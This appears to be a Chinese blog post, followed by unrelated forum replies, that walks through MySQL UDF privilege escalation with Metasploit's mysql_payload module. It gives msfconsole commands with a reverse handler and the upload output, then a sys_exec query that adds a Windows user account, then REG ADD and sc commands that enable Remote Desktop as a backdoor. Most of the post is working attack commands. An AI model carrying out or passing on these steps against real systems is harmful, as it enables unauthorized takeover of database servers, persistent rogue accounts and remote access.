Metasploit MYSQL_udf提权

admin

这个时候就有了一个执行的shell 新建bat或者执行cmd /c 运行命令或者反弹个payloads。

select sys_exec(“c://windows/system32//cmd.exe /c net user dskjajkdlalk dsakjdjkasjkl /add”);

drop Function sys_exec ;

search mysqlmsf > use exploit/windows/mysql/mysql_payloadmsf exploit(mysql_payload) > show optionsmsf exploit(mysql_payload) > set password ssccd* msf exploit(mysql_payload) > set rhost 111.111.111.111 msf exploit(mysql_payload) > show optionsmsf exploit(mysql_payload) > exploit

Started reverse handler on 192.168.1.116:4444

Checking target architecture...

Checking for sys_exec()...

Checking target architecture...

Checking for MySQL plugin directory... [-] MySQL Error: RbMysql::UnknownSystemVariable Unknown system variable 'plugin_dir'

Target arch (win32) and target path both okay.

Uploading lib_mysqludf_sys_32.dll library to d:/Program Files/MySQL/MySQL Server 5.0/bin/KLCheXrJ.dll...

Checking for sys_exec()...

MySQL function sys_exec() not available <a href="http://www.sysshell.com/wp-content/uploads/2012/12/mysqludf.png"><img class="alignnone size-medium wp-image-408" title="mysqludf" src="http://www.sysshell.com/wp-content/uploads/2012/12/mysqludf-300x284.png" alt="" width="300" height="284" /></a>
Create Function sys_exec returns string soname 'KLCheXrJ.dll';

这个时候就有了一个执行的shell 新建bat或者执行cmd /c 运行命令或者反弹个payloads。

select sys_exec("c:\\windows\\system32\\cmd.exe /c net user dskjajkdlalk dsakjdjkasjkl /add");

drop Function sys_exec ;

用到了。 开3389.
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
sc config termservice start= auto >c:\123.txt
sc qc termservice >>c:\123.txt
sc start termservice >>c:\123.txt
sc qc termservice >>c:\123.txt

wyy0517

帮你项项吧  

大明龙权

我帮你 喝喝  

0756zj.com

谢谢分享了!   

沧海刘

初来乍到，请多多关照。。。  

挥手丶笑倾城

在她兜里放些零钱，在她不常用的兜里放张一百。  

明勇琨

不错!  

妳是最美的拥有

我的啦嘿嘿  

八神丶

世界上那些最容易的事情中，拖延时间最不费力。  

高一

今天无聊来逛逛